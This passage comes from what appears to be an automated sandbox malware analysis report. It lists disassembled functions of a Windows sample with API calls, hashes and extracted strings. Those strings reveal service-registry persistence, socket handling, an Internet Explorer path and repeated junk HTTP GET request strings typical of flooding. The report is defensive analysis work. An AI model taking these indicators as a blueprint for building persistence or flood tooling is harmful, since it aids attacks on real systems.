                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _mbscat$File$DirectorySystem$??2@??3@CloseCreateDeleteHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 772766158-0
                                                                    • Opcode ID: f050e5c3edf36beb89aad5587e9d684fb1ab774ce35e067b3901d3a834f974d1
                                                                    • Instruction ID: 8812fba37a6cf724851fda54bdb19bde2bf75586ae27e468a73a39f5530bd05d
                                                                    • Opcode Fuzzy Hash: f050e5c3edf36beb89aad5587e9d684fb1ab774ce35e067b3901d3a834f974d1
                                                                    • Instruction Fuzzy Hash: 230186F5D0425867DF20FB65CD85EC9B7AC5B14314F0408ABE380F3181D7B896E58755
                                                                    Function 10005BF2 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 36stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 10005C23
                                                                    • wsprintfA.USER32 ref: 10005C34
                                                                    • lstrlenA.KERNEL32(?,00000000), ref: 10005C42
                                                                      • Part of subcall function 1000A87A: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,75A78400,00000000,?,1000AF24,1000D480,000000FF,\Services\%s,10005404,80000002,?,00000072,00000001,00000065,00000000), ref: 1000A8A7
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 1000A8BE
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 1000A8C9
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 1000A8D4
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 1000A8DF
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 1000A8EA
                                                                      • Part of subcall function 1000A87A: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 1000A8F5
                                                                      • Part of subcall function 1000A87A: FreeLibrary.KERNEL32(00000000), ref: 1000A9E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$FreeLoadlstrlenmemsetwsprintf
                                                                    • String ID: Clore$SYSTEM\Clore
                                                                    • API String ID: 1858923263-3032097531
                                                                    • Opcode ID: c96fd17569b00c9799cf99e387fe8b9af171654239dc34e10faca6164efdcadd
                                                                    • Instruction ID: ef584545b31a73a41dd0c12d4d9e16c99bfa3ea8564b03a7c1ae98d9019e7cca
                                                                    • Opcode Fuzzy Hash: c96fd17569b00c9799cf99e387fe8b9af171654239dc34e10faca6164efdcadd
                                                                    • Instruction Fuzzy Hash: EBF0BBF69001187BEB109764CC05FDA766DAB04744F0005B4B705B5091DA70E6958A58
                                                                    Function 100037DC Relevance: 7.5, APIs: 5, Instructions: 35stringthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strcpy.MSVCRT(10014E04,?,?,00000000,1000668E,?,?,?), ref: 100037E7
                                                                    • strcpy.MSVCRT(10014F04,?,10014E04,?,?,00000000,1000668E,?,?,?), ref: 100037F5
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 1000381C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000381F
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003470,00000000,00000000,00000000), ref: 10003835
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThreadstrcpy$CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 4065114739-0
                                                                    • Opcode ID: 6e064e396c2b10128c808703839d6419c5fac0bf89b6e03ced8f04a0ff01337a
                                                                    • Instruction ID: 4ceaf8b7eb5f6f54983e7899383afec7859fd2df3ca1b3d27b4fb4b6cf297609
                                                                    • Opcode Fuzzy Hash: 6e064e396c2b10128c808703839d6419c5fac0bf89b6e03ced8f04a0ff01337a
                                                                    • Instruction Fuzzy Hash: 32F06DF150522CBEF6019BA48CC4CAB7FDCEB4A1E87414469F20492226CB34AC848BB1
                                                                    Function 00409E60 Relevance: 7.5, APIs: 5, Instructions: 28COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00409E85
                                                                    • CancelIo.KERNEL32(?,?,?,?,00409A9F), ref: 00409E8E
                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00409E9A
                                                                    • closesocket.WS2_32(?), ref: 00409EA3
                                                                    • SetEvent.KERNEL32(?,?,?,?,00409A9F), ref: 00409EAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                    • String ID:
                                                                    • API String ID: 1486965892-0
                                                                    • Opcode ID: 836b5f37c497276a5c177910c8051b1fe3d23b3599964cc5168669c5bb626d52
                                                                    • Instruction ID: 214bdb797ce9b3806abe695a8f89653cfa2cd86d3a48c32c0ca57aa75e999f02
                                                                    • Opcode Fuzzy Hash: 836b5f37c497276a5c177910c8051b1fe3d23b3599964cc5168669c5bb626d52
                                                                    • Instruction Fuzzy Hash: D5F05431110728EFEB209B95CC4EEC677B8FF05354F104518F782915F4D7B1A9449B50
                                                                    Function 004128C6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(100140CC,?,?,?,?,1000AF24,1000D480,000000FF,\Services\%s,0040D450,80000002,?,00000076,00000001,0000005C,00000000), ref: 004128F3
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,1000AF24,1000D480,000000FF,\Services\%s,0040D450,80000002,?,00000076,00000001,0000005C), ref: 00412A35
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$FreeLoad
                                                                    • String ID: \Services\%s
                                                                    • API String ID: 534179979-3692262031
                                                                    • Opcode ID: c4a2985d78c2249bdba3fc027b41f981ced2e4ddd7b1e8fab8dbb935d79d5b04
                                                                    • Instruction ID: 467d181776a1e2beeecfa0b3b370f3bcece887172159f2bfa2eb347e1e1669ea
                                                                    • Opcode Fuzzy Hash: c4a2985d78c2249bdba3fc027b41f981ced2e4ddd7b1e8fab8dbb935d79d5b04
                                                                    • Instruction Fuzzy Hash: 6341F671900219BBDF259F94DD84EFEBBB9EF08790F004126FA10E6160DB749D919B64
                                                                    Function 00411E5F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _mbscpy.MSVCRT(00000000,10013F48,1000C0C4), ref: 00411E8C
                                                                    • _mbscat.MSVCRT ref: 00411E9D
                                                                    • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,00411707,?,?,?,1000C0C4), ref: 00411EBC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Open_mbscat_mbscpy
                                                                    • String ID: Rsjshd fzfgkqcm
                                                                    • API String ID: 3603629427-3753134293
                                                                    • Opcode ID: 6b02bb4a98b5fffd6b39a6eb6612497dcd227c00fd52fd8f665e7fa4e407ce81
                                                                    • Instruction ID: f404b012dcdcdecafacfe39016de559747c1f6697b09e6aca63dcdb9e67b975b
                                                                    • Opcode Fuzzy Hash: 6b02bb4a98b5fffd6b39a6eb6612497dcd227c00fd52fd8f665e7fa4e407ce81
                                                                    • Instruction Fuzzy Hash: 2BF05E76E0821C7AEB50D6A4CC06FE9776CD714700F1004A5A385F1081EAB4AAD98A11
                                                                    Function 0040BF4E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcessId.KERNEL32 ref: 0040BF5B
                                                                    • strlen.MSVCRT ref: 0040BF75
                                                                    • memcpy.MSVCRT(?,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#,00000000,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#), ref: 0040BF80
                                                                    Strings
                                                                    • GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#, xrefs: 0040BF6B, 0040BF74, 0040BF7E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentProcessmemcpystrlen
                                                                    • String ID: GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#
                                                                    • API String ID: 1583653051-4039768343
                                                                    • Opcode ID: 103fc4b8f4a71ce21707e906526d356906a3b5cba268e0895f2aadc7028c4acf
                                                                    • Instruction ID: 9c6fddf69943fceb1b3b240db6a4755dfe01c59e60c080b90881e1fd278b3123
                                                                    • Opcode Fuzzy Hash: 103fc4b8f4a71ce21707e906526d356906a3b5cba268e0895f2aadc7028c4acf
                                                                    • Instruction Fuzzy Hash: FEE0261341479091E311A714D805B8F7BE8EFC1310F05C82DE8C893142D3BC549983B6
                                                                    Function 10003F02 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcessId.KERNEL32 ref: 10003F0F
                                                                    • strlen.MSVCRT ref: 10003F29
                                                                    • memcpy.MSVCRT(?,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#,00000000,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#), ref: 10003F34
                                                                    Strings
                                                                    • GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#, xrefs: 10003F1F, 10003F28, 10003F32
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentProcessmemcpystrlen
                                                                    • String ID: GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#
                                                                    • API String ID: 1583653051-4039768343
                                                                    • Opcode ID: da4e982248df773582f56941d9bb260a15c758742642200ffc68563da647e673
                                                                    • Instruction ID: 11f757409b1cd0d19d4aea9d26337259edca0c4abe8b3e42c820718d39602bdf
                                                                    • Opcode Fuzzy Hash: da4e982248df773582f56941d9bb260a15c758742642200ffc68563da647e673
                                                                    • Instruction Fuzzy Hash: 64E0260342479192E311D714D805E8F7BF8EFC2220F05C82DE8CA13546D778648983A2
                                                                    Function 1000383A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000384F
                                                                    • lstrcatA.KERNEL32(?,\Program Files\Internet Explorer\iexplore.exe), ref: 10003868
                                                                    • lstrcpyA.KERNEL32(?,?), ref: 10003878
                                                                    Strings
                                                                    • \Program Files\Internet Explorer\iexplore.exe, xrefs: 10003862
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DirectorySystemlstrcatlstrcpy
                                                                    • String ID: \Program Files\Internet Explorer\iexplore.exe
                                                                    • API String ID: 2630975639-1907246925
                                                                    • Opcode ID: 8ace842f704627082718ecb96691a6b1b56ec2f04b63d296671ce1c14dbc9da3
                                                                    • Instruction ID: bbe2ddb81922598e9396f6ac1daa09be34c61657f3e4fa9a5e482b7cf1854fd5
                                                                    • Opcode Fuzzy Hash: 8ace842f704627082718ecb96691a6b1b56ec2f04b63d296671ce1c14dbc9da3
                                                                    • Instruction Fuzzy Hash: 94E01AB580422CABEB10ABA0DD8EFC97B7C9B14344F004191E385E5095D6F0A6D8CB91
                                                                    Function 00409EB9 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040933D: VirtualFree.KERNEL32(?,00000000,00008000,?,00409ECE,?,00000000,00000000,00000000), ref: 0040934F
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,?,?,00000000,00000000,00000004,00000000,00000004,?,00000004,?,00000006,?,00000000,00000000), ref: 00409F51
                                                                    • memcpy.MSVCRT(00000000,?,00000001,00000001,?,?,00000000,00000000,00000004,00000000,00000004,?,00000004,?,00000006), ref: 00409F60
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000001,00000004,?,00000004,?,00000006,?,00000000,00000000), ref: 00409F88
                                                                    • memcpy.MSVCRT(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00409EF2
                                                                      • Part of subcall function 00409098: memcpy.MSVCRT(?,00000006,00000006,00000000,?,00409F9D,?,00000006,?,00000000,00000000,00000000), ref: 004090C0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpy$??2@??3@FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1750327678-0
                                                                    • Opcode ID: dcb59910b3c02c62117bc63df6d97dcbc1976871db7b907ee2b147ec10852ea4
                                                                    • Instruction ID: 22d8d4c07f5d330ebdc17b517f74b82fb851f5663cba1337fe1f311b2d6b2e64
                                                                    • Opcode Fuzzy Hash: dcb59910b3c02c62117bc63df6d97dcbc1976871db7b907ee2b147ec10852ea4
                                                                    • Instruction Fuzzy Hash: AF317671600204BADF15EF65C942AEF776AAF44304F04803EFA05B62C2DB799E159B58
                                                                    Function 00409295 Relevance: 6.1, APIs: 4, Instructions: 66memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004091A1: _ftol.MSVCRT ref: 004091B5
                                                                    • _ftol.MSVCRT ref: 004092C7
